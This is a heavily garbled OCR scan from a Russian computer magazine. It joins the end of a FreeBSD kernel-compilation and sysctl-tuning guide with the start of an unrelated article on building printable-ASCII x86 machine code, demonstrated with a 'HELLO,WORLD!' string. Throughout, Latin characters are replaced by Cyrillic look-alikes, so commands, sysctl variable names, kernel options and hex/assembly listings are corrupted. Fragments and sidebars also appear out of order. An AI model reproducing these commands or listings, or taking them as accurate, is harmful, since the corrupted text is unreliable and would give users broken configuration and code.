циями флагов (в принципе, на сервере это делать не рекомендуется, так 
как теряется возможность использования расширения ВЕС 1644, а для 
десктопа это не критично); третий — генерируем случайное значение в 
поле Ю ІР-пакета вместо того, чтобы каждый раз увеличивать его на 
единицу (препятствует ісііе-сканированию); четвертый — блокируем па- 
кеты с установленным флагом ВЗТ (защищает от некоторых типов 
005-атак). С помощью зузсіі можно произвести более тонкую настрой- 
ку сетевой защиты, но об этом позднее. Будь внимателен — во РееВЗЭ 
5-ЗТАВЬЕ и выше все эти опции вынесены в соответствующие зузсіі-пе- 
ременные, и в виде опций ядра собираться уже не могут. 

Далее идут несколько директив, связанных с компиляцией многопро- 
цессорного ядра (также для серверов), имя главной из которых — ЗМР. 
Оставшуюся часть файла занимает обширный список девайсов. Прин- 
цип его редактирования прост: все строки, относящиеся к ненужным те- 
бе устройствам, могут быть безбоязненно закомментированы/удалены. 
Однако есть некоторые исключения: например, нельзя удалять строку 
беѵісе іза, даже если у тебя на компьютере нет ни одного ІЗА-слота, а 
также удалять поддержку ЗСЗІ, если есть ЮЕ СЭРОМ или ІІЗВ-флешка. 

орііопз ОЭВ 
орбопз ХЗЕВѴЕВ 
беѵісе ЬрІ 

Первая опция — это включение ядерного отладчика (не нужен), вторая 
включает Х-сервер на ѵі-консоли (ѵЮ) (сомнительно), а третья — псев- 
доустройство берклеевского пакетного фильтра (необходим на серве- 
рах для работы пакетных фильтров, ЮЗ, или в случае, когда ты сам ак- 
тивно мониторишь/снифаешь сеть). 

Далее приведу несколько интересных опций из конфигурационного 
файла І_ІЫТ. 

орііопз "СНІЮ_МАХ=40" 

Этот параметр указывает максимальное количество порожденных про- 
цессов, которые могут быть созданы родительским. В некоторых случа- 
ях может потребоваться увеличить этот параметр. 

орІІОПЗ "0РЕІ\І_МАХ=64" 

Максимальное количество файлов, которые могут быть открыты про- 
цессом. Лучше сразу увеличить значение параметра до 128, даже на 
десктопе. 

орІІОПЗ РАИЗАРЕ 

Данная опция повышает надежность системы, так как запускает допол- 
нительные проверки в наиболее опасных местах (что, к сожалению, ска- 
зывается на быстродействии). 

орііопз ІІ\ІСШ0Е_С(Ш6_РІІ_Е 

Указанная опция полезна, если ты вдруг потеряешь конфиг. Она вклю- 
чает текущий файл конфигурации ядра в файл кегпеі, откуда ты смо- 
жешь его потом при необходимости выцепить. Довольно сомнительная 
опция, которая к тому же занимает память. 

Следующая строчка сообщает, что ядро носит имя кегпеі, загрузка бу- 
дет проходить с асІО, дампы будут скидываться на это же устройство. Ес- 
ли ты владелец ЗСЗІ-девайса, то поменяй на баО. 

сопТід кегпеі гооі оп абО битрз оп абО 

Размер памяти, выделенный ядру (рекомендуется уменьшить): 

орбопз "МАХМЕІѴЦ51 2*1 024)" 

А дальше комплект связанных параметров: 

орбопз ІІЗЕВСОІМРІО 
орбопз ІІЗЕВС0І\ІРІ6_В00Т 
орііопз ѴІЗУАЦЛЗЕВССМІб 

При наличии первой опции в ядро будет включен редактор установок яд- о 
ра, который ты сможешь вызвать во время запуска, введя -с в ответ на 5 
приглашение 'Ьооі'. Со второй опцией данный редактор запускается ав- о> 
томатически, а третья предоставляет более удобный визуальный вари- о. 
ант все того же эдитора. * 

Теперь нужно немного разобраться с псевдоустройствами: 
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ѲЕІЧЕВІС собственной персоной 



# ССІ / 

# сИТІадз позеИд кегпеі 

# ер кегпеі кегпеі. пеѵѵ 

# ер кегпеі. пиІІ кегпеі 

# сИТІадз зебд кегпеі 

# геЬооІ 

В пятой фряхе механизм загрузки ядра, отличного от 
/ЬооІ/кегпеІ/кегпеІ, несколько иной (ок — это приглашение 
загрузчика): 

ок кісіипіоасі 

ок зеі тос]иІе_ра^і=/ЬооѴкегпеІ.оІс] 
ок Ьооі /ЬооѴкегпеІ.оІб/кегпеІ 

В системе должен присутствовать файл /Ьооі.сопіід, в об- 
ратном случае создай его такой командой: 



// Псевдотерминалы, их активно используют такие программы, как 
Іеіпеі, гіодіп, ззіі, хіегт 
рзеисіо-сіеѵісе рѣу 

// Проигрывание музыки на спикере компа. Примеры таких мелодий 
есть в /изг/зЬіп/зркгІезІ 
рзеисіо-сіеѵісе зреакег 

// Распаковываем сжатые исполняемые файлы «на лету» 
рзеисіо-сіеѵісе діір 

// Превращает файл в устройство (ѵпосіе-драйвер). С его помощью 
можно, например, просмотреть образ дискеты, как обычную дискету, 
а также увеличить зѵѵар (создаем файл нужного размера, «превра- 
щаем» его в «диск» и подключаем как зѵѵар). Работает только во 
РгееВЗй 4.x, так как в «пятерке» для подобных целей используются 
тб-устройства 
рзеисіо-сіеѵісе ѵп 

// Позволяет подглядывать за другими юзерами в консоли (только 
для гооі) 

рзеисіо-сіеѵісе зпр 

// С помощью этого параметра можно объединить несколько дисков 
(разделов) в один логический, создать зеркальные диски 
рзеисіо-сіеѵісе ссб 

Теперь перейдем к сетевым псевдоустройствам: 

рзеисіо-сіеѵісе Іоор // интерфейс обратной петли 
рзеисіо-сіеѵісе еНіег// поддержка ЕФегпеІ 
рзеисіо-сіеѵісе Іббі // поддержка РйОІ 
рзеисіо-сіеѵісе зі // поддержка ЗЫР (в России данный 
вид соединения практически не используется) 
рзеисіо-сіеѵісе ррр // поддержка РРР 
рзеисіо-сіеѵісе бізс // то же самое, что и /беѵ/пиІІ, только 
для устройств. В обычной работе не нужно 
рзеисіо-сіеѵісе іип // используется программой ррр 

Очень часто можно наблюдать после названия устройства 
цифру — количество создаваемых соответствующих девай- 
сов (/беѵДооО — /6еѵ/іооЫ). В современных версиях фряхи 
псевдоустройства работают как так называемые сІопаЫе 
беѵісез, то есть очередное устройство создается по мере 
необходимости, так что количество указывать не надо. 

Пора приступать к сборке ядра: 



# есбо /Ьооі/Іоабег > /Ьооісопіід 

Кроме того, обязательно проверь в каталоге /Ьооі наличие следующих 
файлов: ЬооЮ, Ьооіі , Ьоо12, Іоабег. Все, едем дальше. 

[тюнинг РгееВ$й средствами зузсіі] Механизм зузсіі позволяет 
выполнять динамическое переконфигурирование и настройку некото- 
рых компонентов операционной системы «на лету». С помощью зузсіі 
можно оптимизировать множество вещей: сетевую подсистему, работу 
виртуальной памяти, жестких дисков и т.д. Программа зузсіі, работаю- 
щая в пространстве пользователя (изегіапб), управляет ключевыми пе- 
ременными ядра. Рассмотрим самые интересные из них, но сначала 
разберем методы работы с зузсіі: 

Для вывода всех доступных для чтения переменных зузсіі на экран: 

# зузсіі -а 

Для чтения конкретной переменной: 

# зузсіі имя_переменной 

Для присваивания значения переменной: 

# зузсіі имя_переменной=присваиваемое_значение 

Переменные зузсіі обычно принимают следующие типы значений: стро- 
ковые, числовые и булевые (1 — да, 0 — нет). Если ты не хочешь каж- 
дый раз после загрузки устанавливать необходимые значения перемен- 
ных, добавь их в /еіс/зузсИ.сопі. 



рЮ03_1Ъ . а іо_1 15І іо_пах : -1 

рЮ03_1Ъ . а іо_пах : -1 

р1003_1Ъ . а іо_рг іо_йе 1іа_пах : -1 

р1003_1Ъ . Й 0 Іауі іпег_пах : 0 

р1003_1Ъ . г^_ор0п_тах : 0 

р1003_1Ъ . рад05 І20 : 4096 

р1003_1Ъ . гІ5 ід_тах : 0 

р1003_1Ъ . 50п_п50іі5_пах : О 

р1003_1Ъ . 50п_уа 1іі0_тах : 0 

р1003_1Ъ . 5 і дди.0Ц0_пах : 0 

р1003_1Ъ . і іп 0 г_тах : 0 

сотраі . 1 і лих . окна не : Ь і лих 

сотраі . 1 і лих . озго Іоазо : 2.4.2 

сотраі . 1 ілих .О55_и0гзіол : 198144 

50сиг ііу . ^а і 1 . 50І_Ьо5Ілат0_а 1 Іоней : 1 

50сиг ііу . ^а і 1 . 5оск0І_ил іх іргоиіо_ол 1у : 1 

50сиг ііу . ^а і 1 . зузи ірс_а 1 Іоыой : О 

50сиг ііу . ЪзА . 5и50г_0лаЬІ0Й : 1 

50сиг ііу . ЪзА . 500_оіЬ0г_и іАз : 1 

50сиг ііу . ЪзА . 500_оіЬ0г_д іАз : 1 

50сиг ііу . ЪзА . сол50гиаі і и0_5 ідла І5 : 1 

50сиг ііц . ЪзА . илрг і и і І 0 д 0 Д_ргос_Д 0 Ьид : 1 



вывод команды зузсіі -а 



# сб /изг/зге 

# таке ЬиіІбкегпеІ КЕВЫС0ЫР=МУКЕВЫЕ1 

# таке іпзіаіікегпеі КЕВЫС0ЫР=МУКЕВЫЕ1 

Данный механизм давным-давно заменил старый сопіід 
МУКЕРЫЕЪ && ссІ ../../сотріІе/МѴКЕВІ\ІЕІ_ && таке сіер && 
таке && таке іпзіаіі. Ребутимся. Наслаждаемся своей ра- 
ботой. К сожалению, иногда приходится бороться с кегпеі 
рапіе. Если это произошло, грузи старое ядро и водворяй 
его на место. Допустим, имя твоего старого ядра кегпеі. пиІІ. 
Ни в коем случае не называй этот файл кегпеі. оіб. На приг- 
лашение Ьооі: вводи Ьооі: кегпеі. пиІІ. А после загрузки: 





[управление безопасностью] 

зесигі1у.ЬзсІ.ипргіѵіІедесІ.ргос_сІеЬид — позволяет выполнять отладку 
пользовательского процесса (например, через рігасе). 
5есигіІу.ЬзсІ.зее_оІ[іег_иісІз, зесигіІу.ЬзсІ.5ее_оІ[іег_дісІз — позволяет 
пользователям видеть чужие процессы и сокеты, используя рз, пеі- 
зіаі и ргосТз. 

5есигіІу.Ьзсі.ипргіѵіІедесІ_геасІ_тздЬиІ — разрешает пользовательско- 
му процессу читать из системного консольного буфера сообщений. 
5есигіІу.Ь5б.[іагсІІіпк_с[іеск_иісІ,5есигіІу.ЬзсІ.[іагсіІіпк_с[іеск_дісІ — 
пользователи могут делать ііагсіііпк только на собственные файлы. 
зесигіІу.ЬзсІ.сопзегѵаІіѵе.зідпаІз — запрещает посылать некоторые 
сигналы зеШісІ/зефісі процессам. 

5есигіІу.Ьзб.ипргіѵіІедесІ_деІ_дио{а — разрешает пользователям 
смотреть информацию по установленным для них квотам. 

[оптимизация дисков] 

ѵТз.ѵтіосІігепаЫе — эта опция отвечает за метод кэширования ката- 
логов. В принципе, нужна только на машинах, оперирующих боль- 
шим количеством файлов, например, на почтовых серверах. 
\45.ѵѵгіІе_ЬеІііпсІ — позволяет записывать файлы на носитель по кластерам. 
ѵІз.Ыгиппіпдзрасе — определяет количество запросов записи на 
диск, которые могут стоять в очереди. Этот параметр можно увели- 
чить (особенно на машинах с большим количеством дисков), но не 
сильно, иначе можно наблюдать падение производительности. 
ѵт.зшр_ісіІе_епаЫесІ — данная переменная (совместно с 
ѵт.зшр_ібІе_Шге5боІсІ1 и ѵт.5шр_ібІе_ІбгезбоІб2) нужна лишь на ма- 
шинах с большим количеством пользователей и ожидающих процессов. 
Ім.аіа.ѵѵс — включает и выключает режим кэширования записи на 
ЮЕ-диск. Отключение этой опции вызывает ощутимое снижение про- 
изводительности. Причиной отказа от ее использования может стать 
ранняя версия фряхи (<= 4.3), либо проблемы с железом. 
кегп.сат.зсзі_сІеІау — уменьшение этого параметра (задается в мил- 
лисекундах) обычно сокращает время загрузки системы. В принципе, 
на современной машине можно уменьшить это значение до 5. Эта оп- 
ция используется в РгееВЗЭ >= 5.0 и настраивается во время загрузки. 

[работа в сети] 

пеііпеіір.іогшгсііпд — если установить значение равным 1 , то маши- 
на будет форвардить ІРѵ4-пакеты между сетевыми интерфейсами, 
пеііпеиср.зепсізрасе и пеііпеііср.гесѵзрасе — входящий и исходя- 
щий буферы ТСР-подключений. Обычное значение для машин с 
большим количеством памяти — 65535. Прежде чем увеличивать па- 
раметр, обратись к пеІіпеІІср.гІс1323, а также к ману Щпіпд(7). 
пеІіпеиср.тзІ=7500 — время ожидания АСК в ответ на ЗѴІМ-АСК или 
РІІМ-АСК (в миллисекундах). 
пеІіпеІістр.істрІіт=50 — задаем мак- 
симальное количество ІСМР-пакетов с 
типом сІезІіпаІіоп-ипгеасбаЫе и ТСР-па- 
кетов, с установленным флагом ВЗТ (в 
данном случае 50 пакетов в секунду). 
пе1.іпеиср.ЫаскбоІе=2 — предписы- 
ваем отбрасывать без отправки ВЗТ 
все ТСР-пакеты, адресованные на 
закрытый порт. 

пе!.іпеІ.ис]р.ЬІаскІіоІе=1 — предпи- 
сываем отбрасывать все ІЮР-паке- 
ты, которые были адресованы зак- 
рытым портам. 

кегп.ірс.5отахсопп=1024 — изменение 
числа одновременно открытых сокетов. 

[полезные мелочи] Ну что ж, наш путь оптимизатора РгееВЗО мож- 
но считать почти завершенным. Мы совершили два глобальных перево- 
рота в жизни нашей системы: перекомпилировали ядро и потвикали 
значения переменных зузсіі. Но остались некоторые мелочи, о которых 
стоит рассказать, попутно дав несколько советов. 

Мы уже рассмотрели ситуацию, когда свежесобранное ядро не хочет 
грузиться, но случается, что проблемы возникают еще раньше. Вот их 
и разберем. 

Л Не удается выполнить команду сопіід (сборка прекращается с сооб- 
щением ипкпоѵѵп орЛоп) — очевидно, в твой конфиг ядра закралась син- 
таксическая ошибка. В этом случае команда сопіід выдаст номер стро- 
ки, в которой обнаружена ошибка. 



\2\ Не удается выполнить команду таке — это тоже, вероятнее всего, оз- 
начает ошибку в конфиге, но не столь очевидную, чтобы сопіід ее обна- 
ружил, либо ошибку при компиляции. 

[з] Не удается установить ядро (таке іпзіаіі или таке іпзіаіікегпеі) — ес- 
ли фряха четвертой ветки и ниже, то необходимо проверить, не стоит ли 
уровень безопасности 1 или выше, так как установка ядра в этих верси- 
ях может выполняться только на уровне безопасности равным 0. 

Если новое ядро успешно собрано и загружено, но такие утилиты, как 
рз, Іор не работают, то это означает, что произошла десинхронизация 
кернела и узерленда, другими словами, версия исходных текстов ядра 
не совпадает с версиями системных утилит. Необходимо привести все 
версии к единому знаменателю (нельзя собирать пятое ядро на системе 
четвертой версии). 

У владельцев фряхи <5.0 могут возникнуть трудности при создании 
файлов устройств. Поясню на конкретном примере. Большинство уст- 
ройств имеет свои файлы в каталоге /сіеѵ. Их при первой установке соз- 
дает скрипт /деѵ/МАКЕОЕѴ . Но может случиться так, что придется само- 
му добавить устройство в систему. Допустим, нам нужно установить ай- 
дишный СБРЮМ. Сначала следует включить строчку беѵісе ассІО в кон- 
фиг ядра. Теперь необходимо проверить наличие в каталоге /сіеѵ фай- 
лов, имена которых начинаются с ассІО. Если такие есть, можно успоко- 
иться, а если нет — нужно ввести следующую команду зГі МАКЕЭЕѴ 
ассІО. Примечание: для сетевых устройств не существует файлов в /сіеѵ, 
а ЗСЗІ-контроллеры используют одинаковый набор файлов в /сіеѵ, и 
создавать их (файлы) не требуется. 

С помощью переменных зузсіі можно снять некоторые ограничения, 
накладываемые ядром: 

кегп.тахйіез — указывает максимальное количество файловых деск- 
рипторов. Стандартное значение определяется параметром тахизегз. 
кегп.ірс.зотахсопп — как помним, с помощью этого параметра можно 
изменять количество одновременно открытых сокетов, 
пеі.іпеі.ір.рогігапде * — эти параметры ответственны за ограничение ко- 
личества портов. В некоторых ситуациях выделенного по дефолту коли- 
чества может не хватить. Диапазон портов контролируется параметра- 
ми пеі.іпеі.ір.рогігапде.іігзі и пеі.іпеі.ір.рогігапде.іазі, которые и надо ре- 
дактировать. 

пе1.іпеиср.іпЯідІіІ_епаЫе — при установке в 1 данная опция задержи- 
вает пакеты для каждого соединения, тем самым ограничивая объем 
передаваемых данных и обеспечивая оптимальную пропускную спо- 
собность канала. При использовании этой переменной нужно устано- 
вить параметр пе1.іпеиср.іпІІідГіІ_сІеЬид в 0, а также привести 
пеипеиср.іпІІідГіІ_тіп к значению, близкому к минимальному — 6144. 
При этом пе1.іпеиср.іпІІідЩ_зІаЬ желательно не изменять, или же из- 
менять синхронно (но в любом случае — это крайняя мера). 

Еще пару слов о сетевых ограничениях. Опция ядра ІММВСШЗТЕВ8 
обуславливает количество тЬи! (структуры и функции тЬи! обеспе- 
чивают управление буферами памяти, используемыми сетевой под- 
системой ядра), доступных машине. На сервере с большим количе- 
ством трафика маленький тЬШ 
будет снижать производитель- 
ность, поэтому этот параметр не- 
обходимо грамотно скорректиро- 
вать. Для машин с солидным объ- 
емом памяти оптимальны значе- 
ния между 4096 и 32768. Слишком 
большое значение указывать 
нельзя — система может упасть 
при загрузке. Количество исполь- 
зуемых в данный момент сетевых 
кластеров можно узнать с по- 
мощью команды пеізіаі -т. Для 
настройки в процессе загрузки ис- 
пользуй переменную кегп.ірс.птЬ- 
сіизіегз. 

Некоторые приведенные выше пе- 
ременные зузсіі предназначены только для чтения. Для разрешения 
этой ситуации надо поместить нужную переменную в файл 
/Ьооі/Іоасіег.сопі. Умолчальные значения хранятся в /Ьооі/сІеіаиІІз/ 
Іоадег.сопі. 

И напоследок: настраивая систему, не забывай про /еіс/гс.сопі. В этом 
файле хранится конфигурационная информация, используемая при заг- 
рузке системы. Все изменения нужно вносить именно в /еіс/гс.соп/ что- 
бы переопределить дефолтные значения из /еіс/деіаиііз/гс.сопі. 

Вот и все. Ты получил демона своей мечты. Как видишь, все оказа- 
лось не так уж и сложно. За дополнительной информацией обра- 
щайся к страницам справочных руководств и не стесняйся спраши- 
вать у дядюшки гугла ;) © 



К зузсіі кегп . тахГ і Іез 
кегп . тахГ і Іез : 3976 
# зузсіі кегп . тахГ і 1ез=3977 
кегп . тахГ і Іез : 3976 -> 3977 
Н зузеѣі кегп . тахГ і Іез 
кегп . тахГ і Іез : 3977 

« I 



работа с переменной зузсіі 
(чтение и присваивание значения) 
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Ассемблерные 

головоломки 

МАШИННЫЕ КОДЫ ДЛЯ НЕПОСВЯЩЕННЫХ 
ВЫГЛЯДЯТ БЕССМЫСЛЕННОЙ АБРАКАДАБРОЙ 
— ЭТО ЗНАЮТ ВСЕ. НО ВОТ О ТОМ, ЧТО МОЖ- 
НО ПОДОБРАТЬ ТАКУЮ ТЕКСТОВУЮ СТРОКУ, 
ВОСПРИНИМАЕМУЮ ПРОЦЕССОРОМ КАК ПОС- 
ЛЕДОВАТЕЛЬНОСТЬ КОМАНД, ДЕЛАЮЩИХ ЧТО- 
ТО ПОЛЕЗНОЕ, — ДОГАДЫВАЮТСЯ НЕМНОГИЕ. 
ПРАКТИЧЕСКОЙ ПОЛЬЗЫ ОТ ЭТОГО, КОНЕЧНО, 
НЕМНОГО, ЗАТО КАКАЯ ГИМНАСТИКА ДЛЯ 

МОЗГОВ! Крис Касперски ака мыщъх 



Может ли 
машина понимать 
естественный язык? 

Поиск текстовых строк, функционирующих как 
нормальный осмысленный код — очень древнее 
увлечение, которым болели еще во времена ди- 
нозавров. В зависимости от структуры машинной 
команды, сложность решения задачи варьируют- 
ся в очень широких пределах. Некоторые плат- 
формы вообще не позволяют написать ничего ос- 
мысленного, некоторые делают это настолько 
тривиальным, что пропадает весь интерес. 
х86-процессоры занимают промежуточное по- 
ложение. Г ибкая система команд и множество 



способов адресации покрывают На диске как обычно ты 

практически всю таблицу АЗСІІ, Я©Д сможешь откопать все 
однако на поиск нужной комбина- сорцы к статье. 

ции могут уйти годы. Никаких 

официальных правил в этой игре нет. Каждый волен назначать их сам. 
Код может быть как 16-, так и 32-разрядным. Главное, чтобы он не ве- 
шал систему и не возбуждал никаких исключений. Теперь поговорим о 
прочих соглашениях. В 16-разрядном режиме обычно используется 
сот-обрамление. При этом АЗСІІ-строка помешается в текстовой файл, 
который затем переименовывается в сот и передается на выполнение 
МЗ-ООЗ. Задача: вывести что-то на экран, причем, использовать пря- 



АХ 


== ООРРб, если 1-й аргумент командной строки начинается символа- 
ми X:, где X соответствует букве несуществующего дисковода; 


== РРООГі, если 2-й аргумент командной строки начинается 
символами X:, где X соответствует букве несуществующего 
дисковода; 


== РРРРИ, если 1-й и 2-й аргументы командной строки ссылаются 
на несуществующие дисководы; 


== 00006, если 1-й и 2-й аргументы командной строки не 
ссылаются на несуществующие дисководы. 
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начальное состояние регистров на момент загрузки сот-файла 




мой доступ к портам ввода/вывода и видеопамяти нежела- 
тельно, так как при прогоне программы под ѴѴіпсІоѵѵз ЫТ это 
приводит к проблемам. Состояние регистров на момент за- 
пуска сот-файла ты можешь посмотреть в таблице. А вот 
другой вариант — текстовая строка оформляется в виде 
массива (например, сііаг х[]="хххххх"), которому передается 
управление. Задача — прочитать входные аргументы и 
возвратить в регистре ЕАХ результат вычислений. Коди- 
ровка может быть любой — МЗ-ЭОЗ, ѴѴІЫ, КОІ-8, но МЗ- 
ЭОЗ намного более популярна, хотя использование неанг- 
лийских символов алфавита, в общем, не приветствуется. 
Для экспериментов нам понадобится: документация на ас- 
семблер (предпочтительнее всего ТЕСН НЕІ_Р), отладчик 
(лучше аѵриііі ничего не видел), НЕХ-редактор (например, 
НТЕ), пиво, вобла и некоторое количество свободного вре- 
мени, а также творческий настрой. 

[алфавит] Всякая письменность начинается с алфавита. 
Для кодирования в «текстовой» форме мы должны отчет- 
ливо представлять структуру машинной команды со всеми 
полями, префиксами и прочими превратностями судьбы, 
которые ее окружают. В этом нам поможет электронный 
справочник ТЕСН НЕІ_Р, который в частности можно найти 
на многих хакерских сайтах. Это настоящая библия прог- 
раммиста под МЗ-ЭОЗ, в которой есть практически все! 

В первую очередь нас будет интересовать таблица опко- 
дов (80x86/87 Орсобез), также известная под именем 
Іпзігисііоп Зеі Маігіх или просто Матрица. На первый 
взгляд она выглядит ужасающе, но, в действительности, 
пользоваться ей проще простого. 

Матрица представляет собой прямоугольную сетку, напич- 
канную опкодами инструкций. По вертикали откладывается 
старший полубайт, а по горизонтали младший. Допустим, 
нас интересует, какая инструкция соответствует машинной 
команде 41 И. Откладываем по горизонтали 4х, откладыва- 
ем по вертикали хі и в точке их пересечения находим ІЫС 
СХ. А теперь решим обратную задачу: по известной коман- 
де найдем соответствующей ей машинный код. Вот, напри- 
мер: РІІЗН 33. Находим такую инструкцию в таблице и ви- 
дим, что она находится в клетке с координатами 1х:х6, зна- 
чит, ее опкод 16М С однобайтовыми командами все понят- 
но. Попробуем разобраться с остальными. В таблице видны 
сокращения: г/т, г8, гіб. іт8, ітіб. Что это? іт это сокраще- 
ния от іттесііаіе, то есть «непосредственное значение» или 
«константа», а числа указывают на разрядность в битах. 
Вот, например, ХОВ АІ_,іт8. Первый байт команды занима- 
ет опкод (34И), второй — непосредственное значение. В 
частности, ХОВ АІ_,69П будет выглядеть так: 34П 69Н. А вот 
другой пример: АЭЭ АХ,іт16Н. Первый байт занимает оп- 
код (05И), а два последних — непосредственное значение 
типа «слово», причем, младший байт располагается по 
меньшему адресу. Поэтому, АОО АХ, 669П кодируется как 
05И 69И 06П. Как видите, все предельно просто. Сокраще- 
ния г8 и гіб обозначают поля, кодирующие 8- и 16-разряд- 
ные регистры, а г/т ко всему прочему включает в себя еще 
и тип адресации, использующийся для доступа к памяти. 
Это довольно громоздкая тема, даже поверхностное описа- 
ние которой требует, как минимум, целой главы. И такая 
глава действительно включена в «Технику и философию 
хакерских атак», электронную версию которой можно най- 
ти на моем Іф-сервере (83.239.33.46). Она лежит в файле 
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однобайтовые команды 
первой группы 



/риЬ/^-сІізазз.рсИ. Добродушно настроенный ТПе Зѵіп 
проделал большую работу по поиску ошибок, которые 
водились там в большом числе и ходили косяками, за 
что ему большое спасибо. Список исправлений оформ- 
лен в виде независимого файла, который находится 
на том же файле /риЬ/рІіскІ .Ьидіізі.сііт. 

Подавляющая часть г/т и г8/1 6 сосредоточена в нечи- 
табельных областях таблицы АЗСІІ (то есть имеет код 
либо меньше 20Н, либо больше 7РН), поэтому пользо- 
ваться ими нам практически не придется. Приятное 
исключение составляют команды, типа: XXX 

[гед16],гед8/16 и XXX [ВР+іт8],гед8/16, да и то далеко 
не со всем набором регистров. Но об этом мы еще по- 
говорим позже, а пока, уподобившись Кириллу и Ме- 
фодию, будет составлять Азбуку. 

Все машинные команды можно разбить на три боль- 
шие группы. К первой относятся однобайтовые коман- 
ды, не имеющие никаких или практически никаких по- 
бочных эффектов. Они могут изменять значение реги- 
стров общего назначения или насиловать стек, но не 
должны лезть в порты, обращаться к памяти и т.д. 
Вторую группу возглавляют двух или трех байтовые 
команды, один из операндов которых представляет 
собой непосредственное значение. Это очень важные 
команды, поскольку непосредственное значение поз- 
воляет кодировать те символы, которые не могут быть 
представлены командами первой группы. В частности, 
символ пробела, без которого не обходится ни одна 
текстовая строка. 

В третью группу попадают все остальные команды. Ис- 
пользовать их можно, но только с осторожностью. Ко- 
роче говоря, первые две группы — это наш активный 
лексикон, а третья — про запас. Получившуюся азбуку 
ты можешь видеть в таблицах. 

Смотри! В первую группу попали все заглавные анг- 
лийские буквы, немного строчных и значительная 
часть знаков препинания. То есть закодировать мож- 
но практически все, что угодно, только бери и пиши! 
Компьютер не выбросит исключения, и наш код будет 
вполне успешно выполнен. Правда, восклицательного 
знака здесь нет. А как же НЕІ_І_О,ѴѴОВІ_0!? Ведь без 
восклицательного знака оно будет ущербным, если не 
сказать неполноценным. Во второй группе команд ни- 
чего подобного тоже не наблюдается. Все они начина- 
ются с «посторонних» знаков, и даже если передать 
восклицательный знак как непосредственное значе- 
ние, получится полная ахинея. Например, АЫЭ АІ_,21Іі 
("$!") или СМР АІ_,21П ("<!"). Выглядит отвратно. На са- 
мом деле, команда с опкодом 21 И все-таки есть. Это, 
как подсказывает Матрица, АЫЭ г/т, гіб. Правда, 
здесь возникает побочный эффект — обращение к па- 
мяти, поэтому приходится подбивать такую регистро- 
вую пару, которая бы не вызывала исключений, нап- 
ример, АІ\Ю [31], 8Р (21 И 24П или "!$") в текстовом 
представлении. Только надо следить, чтобы 31 указы- 
вал на память, не содержащую ничего интересного, 
иначе последствия себя не заставят ждать. Кстати го- 
воря, символ "$" нам очень пригодится, поскольку он 
служит завершителем МЗ-ЭОЗ строк. Для Си-коде- 
ров, привыкших к нулевому байту, это может быть 
несколько неожиданно. 




[ХАКЕР 09 [81] 05 > КОДИНГ 1 1 3] 




















[ХАКЕР 09 [81] 05 > К0ДИНГІ14] 



Давайте для разминки наберем в НЕХ-редакторе строку НЕІ_І_0,ѴѴОВиЭ!$ 
и попробуем ее дизассемблировать: 



00000000: 48 


бес 


ах 


; уменьшить регистр ах на 1 


00000001:45 


іпс 


Ьр 


; увеличить регистр Ьр на 1 


00000002: 4С 


бес 


зр 


; уменьшить регистр зр на 1 


00000003: 4С 


бес 


зр 


; уменьшить регистр зр на 1 


00000004: 4Р 


бес 


бі 


; уменьшить регистр бі на 1 


00000005: 2С 57 


зиЬ 


аі, 057 ; отнять от регистра аі 57Ь 


00000007: 4Р 


бес 


бі 


; уменьшить регистр бі на 1 


00000008: 52 


ризЬ 


бх 


; затолкать в стек регистр бх 


00000009: 4С 


бес 


зр 


; уменьшить регистр зр на 1 


0000000А: 44 


іпс 


зр 


; увеличить регистр зр на 1 


0000000В: 21 24 


апб 


[зі], 


зр ; *зі = зр 



Как видно, программа тасует регистры и в хвост и в гриву. При этом на вы- 
ходе стек оказывается несбалансированным. С одной стороны мы имеем 
три команды ЭЕС 8Р и одну команду РІІ5Н ОХ (которая уменьшает 5Р на 
2), уменьшающие указатель вершины стека на 5 байт, а с другой — одну 
команду ІЫС 5Р. Итого, счет 5:1 ! Стек оказывается опущенным на 4 байта. 
Следовательно, далеко не всякую текстовую строку можно непосредствен- 
но запихнуть в машинный код. В данном случае, для достижения баланса 
к тексту требуется добавить еще четыре буквы О или две команды РОР 
гедіб, которым соответствуют следующие символы: "Х[Ѵ2 Л _]". Например, 
это может быть л НЕІ_І_О,ѴѴОВІ_0!$ л . А что, выглядит вполне достойно! 
Теперь, разобравшись с машинным кодом, перейдем к настоящим голо- 
воломкам. 

[извращения начинаются] Попробуем подобрать текстовую строку, выво- 
дящую заданный текст на экран. В каноническом варианте это выглядит так: 



00000000: В4 09 


тоѵ аЬ, 009 


00000002: ВА 08 01 


тоѵ бх, 00108 


00000005: Сй 21 


іпі 021 Ь 


00000007: СЗ 


геіп 


00000008: 48 45 4С 4С-4Р 2С 


"НЕІ_І_0, 


0000000Е: 57 4Р 52 4С 44 21-24 


ѴѴ0ВЮ!$" 



Практически все символы этой программы нечитабельны, то есть не 
могут быть напрямую введены с клавиатуры. Здесь придется хит- 
рить. Начнем с инструкции МОѴ АН, 09Гі, заносящей в регистр АН 
код сервисной функции, ответственный за телетайпный вывод. Заг- 
лянув в Матрицу, мы с огорчением наблюдаем, что все команды пе- 
ресылки регистров МОѴ/І_ЕА имеют опкод, превышающий 7РП, то 
есть вылезающий за американскую часть кодировки АЗСІІ. Ладно, 
не дают нам МОѴ'а и не надо! Используем математические опера- 
ции! В нашем распоряжении есть ІЫС гедІб/ЭЕС гедіб, 311 В и ХОВ. 
Не такой уж и богатый выбор! 

Поскольку, начальное значение регистра АХ равно 0000И, для достиже- 
ния задуманного, нам достаточно вычесть из него значение Р700Н, что 
равносильно сложением с 900Гі. В машинном представлении это будет 
выглядеть приблизительно так: 

[подготовка регистра АН в работе (предварительный вариант)] 

00000000: 20 00 Р7 зиЬ ах, 0Р700 

Опс! Сразу два байта вылетают в штрафбат. Это ООН и Р7Н. Черт! Как 
же быть? Надо подумать... А что если вычислить значение не все сразу, 
а по частям? Короче говоря, нужно разложить Р700Н на ряд слагаемых, 
каждое из которых находилось бы в заданном интервале. Точнее даже 
не интервале, а каждый байт, входящий в слово, удовлетворял бы усло- 
вию 80Н > х > 1 РГі. Чем не головоломка? Любители математики легко 
найдут строгое решение, а всем остальным придется довольствоваться 
методом перебора. Вот, например, если от Р700Гі шесть раз отнять по 
292АН, останется всего 4, которые можно накрутить обычным ЭЕС АХ 
(впрочем, в данном случае «крутить» совершенно необязательно, пос- 
кольку при АН == 9, значение регистра АІ_ игнорируется). В общем, наш 
аналог МОѴ АХ, 9 будет выглядеть так: 

[подготовка регистра АН в работе (окончательный вариант)] 



00000000: 20 2А 29 


зиЬ 


ах, 0292А 


00000003: 20 2А 29 


зиЬ 


ах, 0292А 


00000006: 20 2А 29 


зиЬ 


ах, 0292А 


00000009: 20 2А 29 


